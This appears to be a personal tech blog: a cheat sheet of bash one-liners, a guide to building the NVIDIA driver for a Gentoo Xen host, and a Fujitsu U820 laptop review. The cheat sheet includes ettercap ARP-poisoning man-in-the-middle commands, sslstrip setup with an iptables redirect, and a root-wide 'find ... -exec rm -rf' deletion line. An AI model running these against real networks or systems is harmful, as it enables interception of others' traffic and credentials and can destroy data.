bash> service ssh restart

VLC: capture one frame (25fps) from a webcam and save it in png
bash> vlc v4l2:// --vout=dummy --aout=dummy --intf=dummy --video-filter=scene  --scene-format=png --scene-ratio=25 --scene-width=384 --scene-height=288 --run-time=1 --scene-prefix=frame --scene-path=/path/vlc-capture/ vlc://quit

Convert png to gd2 for nagios:
bash> pngtogd2 image.png image.gd2 0 1;

0 = chunk size
1 = no compression (raw)

Ettercap arp mitm between gw and target and save traffic to a file:
bash> ettercap -Tq -M arp -i eth0 -w traffic.out /1.1.1.1/ /2.2.2.2/;

-T = text
-q = quiet
-i = interface
-w = file
/1.1.1.1/ = gw
/2.2.2.2/ = target

sslstrip
1. bash> echo "1" > /proc/sys/net/ipv4/ip_forward; # enable IP forwarding
2. bash> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000; # redirect all tcp traffic from port 80 to localhost port 10000 (to sslstrip)
3. run sslstrip
4. bash> ettercap -T -M arp -i eth0 -o /1.1.1.1/ /2.2.2.2/; # perform arp poisoning only

Find
bash> find / -name -exec ls -l '{}' ';'
bash> find / -name -exec ls -l {} \;
bash> find / -type f -mtime +4w -exec rm -rf {} \; # delete all files older than 4 weeks
bash> find / -name -exec cat {} >>out \; # output content of found files to file out
bash> tar cf archive.tar $(find . -name myfiles*); # tar all myfiles found into archive.tar

SSH: Socks proxy over ssh
bash> ssh -C -D 1080 user@host

set browser to use 127.0.0.1:1080 as socks server and all web traffic will be going through the ssh tunnel

pppd
bash> pppd noauth 192.168.0.1:192.168.0.2 pty 'ssh user@host -t "pppd noauth"';

this will create a ppp tunnel with IPs 192.168.0.1:192.168.0.2 between localhost and host you ssh into

sed
#search for 'PATTERN ABC' and return 'ABC'
bash> VAL=`sed -n 's/.*PATTERN \([A-Z][A-Z][A-Z]\).*/\1/p' test.txt`;

# group needed match with () then reuseit with \1 OR reuse entire match with &
bash> sed 's/text\([A-Z].*\)text/\1/' test.txt;

example: if test.txt contains textHELLOtext, running the above command will output: HELLO or textHELLOtext if you use & instead of \1
 
grep
# find text across multiple lines with regex - (?s) makes .* match new lines
bash> grep -Pz -o '(?s)PAT1.*PAT2'
 
perl
# remove text across multiple lines with regex - /s makes .* match new lines
bash> perl -0777 -pi -e 's/PAT1.*PAT2//s' test.txt

Exiftool: Increment dates by 1 year
bash> exiftool "-alldates-=1:00:00 00:00:00" picture.jpg

Thursday, October 07, 2010

nvidia driver for gentoo xen host

This is how to get the official nvidia driver working on a Xen host.

xen-4.0.0
gentoo xen-sources-2.6.34-r3 kernel
non-xen 2.6.34.1 vanilla kernel
nvidia-drivers-173.14.27

Thanks to this (original but outdated) article: http://legroom.net/2008/06/22/running-binary-nvidia-drivers-under-xen-host

You need a non-xen kernel to compile the drivers. I used vanilla 2.6.34.1

1. Boot into the xen kernel

uname -a
Linux motoko 2.6.34-xen-r3 #5 SMP Thu Oct 7 11:30:18 EDT 2010 x86_64 Intel(R) Xeon(R) CPU X5355 @ 2.66GHz GenuineIntel GNU/Linux

2. Have /usr/src/linux point to the non-xen kernel

ls -l /usr/src/linux
lrwxrwxrwx 1 root root 19 Oct  7 11:58 /usr/src/linux -> linux-2.6.34.1

3. Build the nvidia-drivers package

emerge =nvidia-drivers-173.14.27

NOTE: nvidia-drivers-195.36.31 does NOT WORK for me

4. Extract the content of the nvidia-drivers package

cd /usr/local/src

bash /usr/portage/distfiles/NVIDIA-Linux-x86_64-173.14.27-pkg2.run -a -x

5. Build the nvidia.ko kernel module

cd NVIDIA-Linux-x86_64-173.14.27-pkg2/usr/src/nv

IGNORE_XEN_PRESENCE=y make SYSSRC=/usr/src/linux module

insmod nvidia.ko

Here's what dmesg shows:

nvidia: module license 'NVIDIA' taints kernel.
Disabling lock debugging due to kernel taint
nvidia 0000:07:00.0: PCI INT A -> GSI 16 (level, low) -> IRQ 16
nvidia 0000:07:00.0: setting latency timer to 64
vgaarb: device changed decodes: PCI:0000:07:00.0,olddecodes=io+mem,decodes=none:owns=io+mem
NVRM: loading NVIDIA UNIX x86_64 Kernel Module  173.14.27  Wed Jul 14 13:01:46 PDT 2010

6. Change /usr/src/linux to point back to linux-2.6.34-xen-r3
ls -l /usr/src/linux
lrwxrwxrwx  1 root root       19 Oct  7 11:58 linux -> linux-2.6.34-xen-r3

7. startx

Please post comments if you get it to work with any other nvidia-drivers versions.

Saturday, August 28, 2010

Fujitsu U820 review




Quick specs
  • Intel Atom Z530 1.6GHz
  • 1x1GB RAM DDR2 @ 533MHz
  • 1.8" 60GB HDD
  • Intel GMA 500 videocard
  • 5.6" 8:5 aspect touch-screen (1280x800) w/ 0.3MP webcam and fingerprint scanner
  • 802.11 BGN wifi + bluetooth + gps
  • 4-cell 5200mAh battery
  • Weight 1.32lb (0.6kg)
Details

Design
This is certainly a unique device and most design decisions come from the need to accomodate such a small form factor. It's well built and  feels sturdy in your hand.

Ports and layout:
Because of the small size the laptop has a limited number of ports, all of them located on the sides. Obviously there is no optical drive.


On the right side we have: wireless/bluetooth switch, CF card slot, spring loaded power switch, AC
On the left side we have: mic, headphone, SD card slot, USB,
kensington lock and volume control.


There is no network or VGA port on the laptop itself, instead it comes with a dongle that you connect in the front (in the port replicator). The stylus is housed in the screen bezel and slides up from the upper right corner.

The speaker is located above the keyboard on the left side next to the "mouse" buttons and provide medium sound quality. They're not very loud.

This model also has built in GPS. The navigation software offered is Garmin Mobile PC and has turn by turn directions. The usefulness of the GPS is questionable since the speakers aren't loud enough to be heard when driving around.

Display:
The laptop has a 5.6" LED glossy resistive touch-screen, with an uncommon 8:5 aspect ratio and a resolution of 1280x800. This resolution is too big for an 5.6" screen so things look a little small. Increasing the DPI to at least 125% solves the problem in windows (still not all applications are aware of this setting) but not when browsing the web. You will have to zoom in on most websites as the text initially is very hard to read. Above the screen there's a webcam with good video quality. Below the screen there are three special buttons - Zoom, Keyboard Light On/Off and Screen orientation toggle. In the lower right corner, there's an Alt button and the fingerprint scanner (used instead a password for logins). All these are there to facilitate when using the laptop in tablet mode and all work as expected. The screen looks bright and colorful offering medium horizontal and vertical viewing angles and being glossy you can use it as a mirror when dark surfaces are displayed.


Keyboard and touchpad:

This laptop does not have a touchpad. Instead it's got a pointing stick on the right side above the keyboard and two mouse buttons on the left side above the keyboard. To the left of the pointing stick there's 3 programmable buttons - Fn, Up and Down. The pointing stick can be frustrating at times and takes some getting used to. Luckily there's always the touchscreen.


The keyboard is quite small but given the form factor it's understandable. Some things aren't where you'd expect them to be and some keys are double mapped. Half of the function keys, the page-up/page-down/home/end/backslash keys and a few others require you to hold down the Fn key. The designers still managed to have a wide Enter and Space bar, but even so the layout takes some getting used to. The keyboard itself has got a solid fee with no flexing or bending of any kind.

Battery and AC adapter:
The battery this laptop came with was a 4-cell
5200mAh rated for 7.5 hours but a more realistic figure is about 5-6 hours. It does stick out the back but it doubles as a quite comfortable handle when in tablet mode. The AC adapter is small enough to be carried around easily as is the VGA/Network adapter dongle.


Performance
The computer came pre-installed with windows vista 32-bit. It's quite slow so i replaced it with windows 7 home premium 32-bit before i ran any of the benchmarks. It boots from power-on to login screen in 52 sec. Shut down takes 16 secs from clicking the button in the start menu to power-off. Going to sleep takes about 13 seconds and waking up - 5 seconds.

Windows experience index:
On AC power in "High Performance" profile - 2.3

Super PI for 1mil and 8mil (on AC power):
"High Performance" profile

CrystalDiskMark:

PCMark05:
On AC power in "High Performance" profile - 1147
On battery power in "High Performance" profile - 1146


3DMark06:

On AC power in "High Performance" profile - 44
On battery power in "High Performnce" profile - 43

Wi-fi speed (on AC power):
Tested on Asus RT-N16 b/g/n wireless router at a distance of 5 feet (2 meters).
On 802.11g it averages to 2.6MB/s - aprox. 40% link utilization

On 802.11n it averages to 9.5MB/s - aprox. 60% link utilization

Video playback:
Playback of a 720p h264 movie is almost possible out of the box. In a window it's running a bit slow, with skipped frames and some sound artifacts here and there but if full screen there's almost no skipping. It pushes both cores of the CPU to 100% but it's quite watchable.
 CPU usage playing 720p
 
To really get silky smooth playback however you need K-Lite Codec Pack so you can use DirectX Video Acceleration (offload decoding to the videocard). Setting the output to "EVR Custom" and "D3D Fullscreen" in Media Player Classic allowed the video to play smoothly and completely lag-free.
CPU usage playing 720p with DirectX Video Acceleration

Playing a video on Hulu in the browser window was barely watchable skipping a second or two at times even though the CPU usage is not maxed out on both cores. 
CPU usage playing Hulu in a the browser window

Full screen playback is better with less frequent skipping and a higher frame-rate but you can still notice it's not very smooth. It does use the CPU less.
CPU usage playing Hulu in full screen

Youtube 480p videos play ok with no skipping but at a noticeably low frame-rate.
 CPU usage playing 480p Youtube

Finally Youtube 360p videos play nice and smooth.

 CPU usage playing 360p Youtube

Hopefully when Flash starts using the videocard for rendering the CPU usage will drop to more manageable levels and the frame-rates will increase.

Compared to Sony VAIO P

What's in the box
Battery, AC adapter, power cord, VGA/network dongle, GPS antena, spare pointing stick cap, manual.

Pros 
- very small and light
- good build quality
- touchscreen
- fingerprint scanner
- small power adapter
- good battery life

Cons
- high screen resolution, fonts too small at times (
1280x800)
- small keyboard

Conclusion
The Fujitsu Lifebook U820 is the successor to the famous Lifebook U810 from a few years ago. The main design has not changed however most of the internal components have been upgraded to specs comparable to those of standard netbooks these days but in a form factor half their size. This device is packed with features and it's got a battery life that will allow you to use it untethered for most of the day. The small screen/high resolution combination can be a challenge at times as well as the size and layout of the keyboard but compromises must be made when venturing into the realm of ultra-portability. Overall - a very impressive full featured computer.